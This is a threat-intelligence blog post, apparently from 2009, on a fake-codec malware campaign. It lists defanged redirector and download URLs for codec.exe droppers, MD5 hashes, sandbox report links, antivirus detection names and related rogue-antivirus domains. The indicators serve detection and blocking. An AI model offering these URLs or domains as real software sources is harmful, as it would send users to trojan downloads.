href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWi4XaxkVv0D0j2OU_jJQA5gn3fS0GOumx1Uez98HHPgTOVw3oQfuDjytj3nPKOo_oTTCiiAv96BLYZlkE1uZh5RdOEIAmumDI2EQ4V3P33DTQGX1XDaks__c9OuGBHAfF2yDirTl1rCo8/s1600-h/loyaltube10.com-FakeCodec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWi4XaxkVv0D0j2OU_jJQA5gn3fS0GOumx1Uez98HHPgTOVw3oQfuDjytj3nPKOo_oTTCiiAv96BLYZlkE1uZh5RdOEIAmumDI2EQ4V3P33DTQGX1XDaks__c9OuGBHAfF2yDirTl1rCo8/s320/loyaltube10.com-FakeCodec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318406966080548530" /></a><br /> <br /><br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><b>Redirectors used</b>: hxxp://us-euro.biz/in.cgi?4&parameter=wifi<br />[195.190.13.234]<br /><a href="http://wepawet.iseclab.org/view.php?hash=ff1eeb8db71dfbfc2ae2710aada59ad1&t=1238292178&type=js">Analysis here </a><br />
<br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://loyaltube10.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaltube10.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2">hxxp://loyaldown11.com/codec/189.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/197.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107011 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">704298be5c6bf8671517c79b827c9206</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=704298be5c6bf8671517c79b827c9206" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/ca71008c571ddad0dd20a0beae25511e" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=152859c8c639017940df5f3865ec05a6f" target="_blank">Report (related: WinPC Defender)</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha">03.29.2009 01:17:30 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /><br /><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyal.com/scan/?id-..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107008 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">eb61517f7f0906dc0e60f0e0afd1bbf1</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=eb61517f7f0906dc0e60f0e0afd1bbf1" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/cef114cf8e0664be1db2657fe7b14a54" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=15b6fc83f49230144f5bf187c8020dcda" target="_blank">Report (related: WinPC Defender)</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">03.29.2009 01:41:38 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Associated websites:</b></td></tr><tr><td height="200"> </td><td><br />[213.163.65.10]<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com <br />rakompoporyadkunazaryadku.com <br />setupdatdownload.com <br />tubeloyal.com <br />velzevuladmin.com <br />win-pc-defender.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br /><br />[213.163.65.9]<br />loyaldown09.com<br />loyaldown11.com <br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.com